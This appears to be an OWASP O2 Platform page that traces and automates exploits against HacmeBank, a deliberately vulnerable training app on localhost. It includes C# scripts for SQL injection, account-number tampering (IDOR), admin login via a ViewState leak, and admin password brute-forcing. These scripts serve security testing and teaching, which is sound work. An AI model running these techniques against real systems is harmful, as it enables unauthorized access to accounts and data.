Using O2 Platform and HacmeBank
Michael from the OWASP Costa Rica chapter wrote a great article about O2 and his first use of using it to automate HacmeBank’s login sequence: Starting with OWASP O2 Platform : a short step in a long journey
In reply I wrote Using O2 with HacmeBank which gives an overview of what you can do today with O2+HacmeBank (and ideas for where to go next)
O2 .NET AST Scanner – HacmeBank – SQL Injection PoC
This example show a complete trace for one of HacmeBank’s SQL injection vulnerabilties.
This was created with O2′s .NET AST Scanner (23-May-10 version) which allows the creation of a complete trace via ‘joining up’ the partial traces (for the web layer and web services layer)
Graph with Big Picture (all nodes)
Part 1 – Exploit/Payload location
Part 2 – Web Layer trace
Part 3 – WebServices trace
Script used to ‘join’ the two traces
// add payload and link it to the first node
var urlNode = "<a href="http://127.0.0.1:57096/HacmeBank_v2_Website/aspx/login.aspx">http://127.0.0.1:57096/HacmeBank_v2_Website/aspx/login.aspx</a>";
var postPayload = "POST payload: txtUserName";
graph.add_Node(urlNode);
graph.add_Node(postPayload);
graph.add_Edge(urlNode, postPayload);
graph.add_Edge(postPayload, graph.nodes()[0]);
// join traces that match the "method.*Ws_UserManagement.Login" reg ex
// with a new node called "INTERNET"
var internetNode = "INTERNET";
graph.add_Node(internetNode);
foreach(var node in graph.nodes())
if(node.str().regEx("method.*Ws_UserManagement.Login"))
{
graph.add_Edge(internetNode, node);
graph.add_Edge(node, internetNode);
}</pre>
Source Code view of Web Layer code and trace
Source Code view of Web Services code and trace
HacmeBank – Unit Tests for Vulnerabilities
The following examples show how to create automated exploits and PoCs (to be later transformed into unit tests) for HacmeBank’s vulnerabilities
This code uses O2′s WatiN integration to create an easy ‘IE automation’ scripting environement
Install and confirm we can login
After Installing HacmeBank and run the following script that will confirm if we are logged in:
var ie = "about:black".ie(0,500,750,500);
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
Vulnerability:User A is able to see User’s B account details
var ie = "about:black".ie(0,500,750,500);
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
ie.link("My Accounts").click();
ie.link("View Transactions").click();
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);
ie.closeInNSeconds(20);
Vulnerability:Sql Injection in Login page
public void vulnerability_Sql_Injection_in_Login_page()
{
setup();
Browser.open(StartUrl);
Browser.field("txtUserName").value("jv ' aaa").flash();
Browser.field("txtPassword").value("jv789").flash();
Browser.button("Submit").flash().click();
}
Vulnerability:Sql Injection in Accounts Details page
[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
setup();
Browser.open(StartUrl);
Browser.field("txtUserName").value("jv").flash();
Browser.field("txtPassword").value("jv789").flash();
Browser.button("Submit").flash().click();
Browser.link("My Accounts").flash().click();
Browser.link("View Transactions").flash().click();
Browser.open(Browser.url()+"' AAAAA ");
}
Vulnerability: Sensitive Information Disclosure in Admin Section Login
[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
setup();
Browser.open(StartUrl);
Browser.field("txtUserName").value("jv").flash();
Browser.field("txtPassword").value("jv789").flash();
Browser.button("Submit").click();
Browser.link("Admin Section").flash().click();
var response = Browser.viewState().ViewState_Values[12];
Browser.field("_ctl3:txtResponse").value(response).flash();
Browser.button("Login").flash().click();
}
Script: Fuzzing Admin password
panel.clear();
var topPanel = panel.add_Panel();
var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";
Action<string> adminLogin =
(password)=>{
ie.open(startPage);
ie.disableFlashing();
ie.field("txtUserName").value("jv").flash();
ie.field("txtPassword").value("jv789").flash();
ie.button("Submit").click();
ie.link("Admin Section").flash().click();
//var secret = ie.viewState().ViewState_Values[12];
ie.field("_ctl3:txtResponse", password);
ie.button("Login").click();
//Add logic to detect admin Login
};
for(int i =0 ; i < 10 ; i ++)
adminLogin("admin" + i);
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
About
The O2 platform represents a new paradigm for how to perform, document and distribute Web Application security reviews. O2 is designed to Automate Security Consultants Knowledge and Workflows and to Allow non-security experts to access and consume Security Knowledge.
O2 can also be a very powerful prototyping and fast-development tool for .NET. Most O2 APIs are written using a Fluent API design, and its core has been published as a separate project called FluentSharp (hosted at CodePlex)
Download
Windows ClickOnce Installer:
Mailing List
The best place to keep updated with the lastest news and developers it to subscribe to the OWASP O2 Platform Mailing list (you can read its archives here)
